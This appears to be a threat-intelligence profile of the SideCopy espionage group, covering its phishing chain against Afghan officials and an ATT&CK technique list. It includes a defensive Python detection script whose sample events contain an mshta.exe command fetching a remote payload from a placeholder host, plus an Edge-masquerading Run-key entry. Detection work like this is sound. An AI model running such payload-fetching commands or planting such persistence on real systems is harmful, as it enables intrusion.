
SideCopy

Also known as: TAG_140

SideCopy is a Pakistan-linked threat actor, assessed in the underlying reporting as likely aligned with or part of the Pakistani government and operating under or alongside the broader Transparent Tribe / APT36 umbrella. Aliases in that reporting include SideCopy and TAG_140. The group is associated with cyber espionage across South Asia and is specifically noted for targeting government, military, and diplomatic entities, as well as sectors such as railways and oil.

Recent reporting attributes, with medium-to-high confidence, a spear-phishing campaign dubbed Operation XENOFISCAL to SideCopy. It targeted Afghanistan’s Ministry of Finance, provincial revenue and finance directorates, and other Pashto-speaking Afghan government officials. In that campaign, SideCopy sent tailored spear-phishing emails carrying ZIP archives that contained malicious LNK files disguised as PDFs and named in Pashto. Opening the LNK launched mshta.exe to retrieve a remote HTA or PHP-hosted payload from a compromised Afghan domain; obfuscated JavaScript and multi-stage in-memory loading followed, ultimately deploying a customized Xeno RAT / XenoRAT 1.8.7 payload. The decoys were Afghan Ministry of Finance staff directories, indicating prior reconnaissance. Persistence was established through Windows Registry Run keys while masquerading as Microsoft Edge; some reporting also notes scheduled-task persistence. Payloads were hosted on compromised Afghan government or education infrastructure, blending malicious traffic with legitimate state activity, while command-and-control infrastructure was hosted separately on European or Bulgaria-linked infrastructure. Reporting also notes SideCopy’s use of compromised domains to host malicious payloads, spear-phishing emails with malicious HTA attachments, malicious embedded archive files, and a legitimate DLL filename such as Duser.dll to disguise a remote access tool.

Beyond delivery and persistence tradecraft, SideCopy has performed host discovery, identifying the IP address, OS version, and country location of compromised hosts. The group uses multiple malware families, including Xeno RAT, Spark RAT, CurlBack RAT, and FalseCub in related reporting, and continuously evolves its tactics to evade detection. Reporting further describes SideCopy as a subgroup of APT36 / Transparent Tribe and notes its involvement in broader Pakistan-aligned cyber activity directed at neighboring countries, including India and Afghanistan.
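The two most detectable steps in the chain described above are mshta.exe fetching a remote HTA/PHP payload (T1218.005) and a Run-key entry that borrows the Microsoft Edge name but points outside Edge's install directory (T1547.001 with T1036 masquerading). The following is an added detection example written for this page, not code from Mallory or from any reporting it summarises. The event records are constructed to resemble Sysmon process-creation and registry-value-set events; the field names, hostnames and paths are assumptions and placeholders, not real indicators.

```python
"""Detection logic for the SideCopy tradecraft described above.

Added example, not part of the Mallory page or any vendor product. Event
records are constructed to resemble Sysmon EventID 1 (process create) and
EventID 13 (registry value set); field names are an assumed schema.
"""
import re
from dataclasses import dataclass

# Constructed sample telemetry (placeholders, not real IoCs).
SAMPLE_EVENTS = [
    # Benign: Edge's own Run entry, image lives under the Edge install path.
    {"type": "registry_set",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "MicrosoftEdgeAutoLaunch",
     "data": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --no-startup-window"},
    # Suspicious: LNK opened from Explorer spawns mshta.exe with a remote URL.
    {"type": "process_create",
     "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\mshta.exe" http://compromised.example.invalid/stage.php'},
    # Suspicious: Run value named like Edge but pointing into a user-writable directory.
    {"type": "registry_set",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value_name": "Microsoft Edge",
     "data": r"C:\Users\user\AppData\Roaming\Edge\msedge.exe"},
    # Benign: mshta running a local HTA from an admin script location.
    {"type": "process_create",
     "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"mshta.exe C:\ProgramData\IT\inventory.hta"},
]

REMOTE_ARG = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
# Directories where a legitimate Edge binary is expected (lower-cased, no trailing slash).
EDGE_INSTALL_DIRS = (
    r"c:\program files\microsoft\edge",
    r"c:\program files (x86)\microsoft\edge",
)
RUN_KEY_SUFFIX = r"\microsoft\windows\currentversion\run"


@dataclass(frozen=True)
class Finding:
    rule: str
    technique: str
    event_index: int


def mshta_remote_payload(ev):
    """T1218.005: mshta.exe launched with a URL on its command line."""
    return (ev.get("type") == "process_create"
            and ev.get("image", "").lower().endswith(r"\mshta.exe")
            and REMOTE_ARG.search(ev.get("command_line", "")) is not None)


def edge_masquerade_run_key(ev):
    """T1547.001 + T1036: Run-key value that looks like Edge but is not under Edge's install path."""
    if ev.get("type") != "registry_set":
        return False
    if not ev.get("key", "").lower().endswith(RUN_KEY_SUFFIX):
        return False
    data = ev.get("data", "").lower().strip('"')
    looks_like_edge = ("edge" in ev.get("value_name", "").lower()
                       or "msedge" in data)
    in_install_dir = any(data.startswith(d + "\\") for d in EDGE_INSTALL_DIRS)
    return looks_like_edge and not in_install_dir


RULES = (
    ("mshta_remote_payload", "T1218.005", mshta_remote_payload),
    ("edge_masquerade_run_key", "T1547.001", edge_masquerade_run_key),
)


def evaluate(events):
    """Run every rule over every event; return findings in event order."""
    findings = []
    for i, ev in enumerate(events):
        for name, technique, predicate in RULES:
            if predicate(ev):
                findings.append(Finding(name, technique, i))
    return findings


if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f"{f.rule:24} {f.technique:10} event #{f.event_index}")
```

Both rules deliberately key on behaviour rather than on the specific domains or hashes from the campaign, so they continue to fire when SideCopy rotates infrastructure; the Edge rule treats any Run entry that names or references Edge outside its install directories as masquerading, which is also the case to tune against locally deployed portable browsers.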


MITRE ATT&CK tradecraft

49 distinct techniques observed across reporting, grouped by tactic (12 of 15 tactics; 68 techniques including sub-techniques). ×N = number of intelligence reports citing this technique.
TA0043 Reconnaissance (3 techniques)
  T1589        Gather Victim Identity Information
  T1592        Gather Victim Host Information
  T1598        Phishing for Information

TA0042 Resource Development (4 techniques)
  T1583        Acquire Infrastructure
    T1583.001    Domains
  T1584 (×3)   Compromise Infrastructure
  T1587        Develop Capabilities
    T1587.001    Malware
  T1608        Stage Capabilities
    T1608.001    Upload Malware
    T1608.002    Upload Tool

TA0001 Initial Access (2 techniques)
  T1190        Exploit Public-Facing Application
  T1566        Phishing
    T1566.001 (×11)  Spearphishing Attachment

TA0002 Execution (4 techniques)
  T1053        Scheduled Task/Job
    T1053.005 (×2)   Scheduled Task
  T1059        Command and Scripting Interpreter
    T1059.001    PowerShell
    T1059.003    Windows Command Shell
    T1059.005    Visual Basic
    T1059.007 (×5)   JavaScript
  T1106        Native API
  T1204        User Execution
    T1204.002 (×9)   Malicious File

TA0003 Persistence (2 techniques)
  T1053        Scheduled Task/Job
    T1053.005 (×2)   Scheduled Task
  T1547        Boot or Logon Autostart Execution
    T1547.001 (×5)   Registry Run Keys / Startup Folder

TA0004 Privilege Escalation (2 techniques)
  T1053        Scheduled Task/Job
    T1053.005 (×2)   Scheduled Task
  T1547        Boot or Logon Autostart Execution
    T1547.001 (×5)   Registry Run Keys / Startup Folder

TA0005 Stealth (8 techniques)
  T1027 (×2)   Obfuscated Files or Information
    T1027.011    Fileless Storage
  T1036 (×5)   Masquerading
  T1140        Deobfuscate/Decode Files or Information
  T1218        System Binary Proxy Execution
    T1218.005 (×7)   Mshta
  T1480        Execution Guardrails
    T1480.002    Mutual Exclusion
  T1497        Virtualization/Sandbox Evasion
    T1497.001 (×2)   System Checks
  T1564        Hide Artifacts
    T1564.006    Run Virtual Instance
  T1620 (×2)   Reflective Code Loading

TA0006 Credential Access (1 technique)
  T1056        Input Capture
    T1056.001 (×2)   Keylogging

TA0007 Discovery (5 techniques)
  T1012        Query Registry
  T1016 (×4)   System Network Configuration Discovery
  T1217        Browser Information Discovery
  T1497        Virtualization/Sandbox Evasion
    T1497.001 (×2)   System Checks
  T1518 (×2)   Software Discovery

TA0009 Collection (5 techniques)
  T1056        Input Capture
    T1056.001 (×2)   Keylogging
  T1113 (×2)   Screen Capture
  T1115        Clipboard Data
  T1123        Audio Capture
  T1125        Video Capture

TA0011 Command and Control (6 techniques)
  T1071 (×3)   Application Layer Protocol
    T1071.001 (×2)   Web Protocols
  T1090        Proxy
    T1090.002    External Proxy
  T1105        Ingress Tool Transfer
  T1219        Remote Access Tools
  T1573        Encrypted Channel
  T1665        Hide Infrastructure

TA0040 Impact (1 technique)
  T1498        Network Denial of Service
IOCs (observables)

59 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. IOC values are gated and are not shown on this public page.

Recent activity

20 sources tracked across advisories, community write-ups, and news.

Profile coverage (counts from the full profile)

  Tradecraft mapping: 49 observed MITRE ATT&CK techniques, grouped by tactic.
  Malware arsenal: 17 families this actor is known to deploy.
  Exploited CVEs: 1 CVE used in known campaigns.
  Observables: 59 domains, IPs, and hashes tied to this actor.